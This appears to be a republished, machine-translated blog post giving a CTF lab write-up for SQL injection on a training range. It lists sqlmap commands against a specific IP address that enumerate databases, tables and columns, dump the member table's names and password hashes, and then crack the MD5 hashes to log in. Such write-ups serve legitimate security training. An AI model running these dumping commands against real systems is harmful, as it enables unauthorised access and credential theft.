当前位置:网站首页>Moher College - SQL injection vulnerability test (error reporting and blind note)

Moher College - SQL injection vulnerability test (error reporting and blind note)

2022-06-27 00:27:00 Lyswbb

Preface

This article is for technical discussion only , Study , Do not use for illegal purposes , It has nothing to do with me to use it for illegal purposes !

First, get to the shooting range and review the questions , It is obvious that it is an error injection

Visit the target after getting the range

Click... Under user login Notice on platform shutdown and maintenance

Click to find url by  http://124.70.71.251:46004/new_list.php?id=1

An error is reported after trying to add a single quotation mark , Discovery database is mariaDB

  Got it injection point , direct sqlmap Just a shuttle

Blast the name of the warehouse 

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 --dbs

Name of Pop Watch 

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup --tables

Pop field name 

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member --columns

detonation name and password The content of 

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member -C name,password --dump

 

  Decrypt   md5 Online decryption ,md5 Decryption encryption

 

  Finally, you can log in and get flag

原网站

版权声明
本文为[Lyswbb]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/178/202206262341530009.html

边栏推荐

猜你喜欢

随机推荐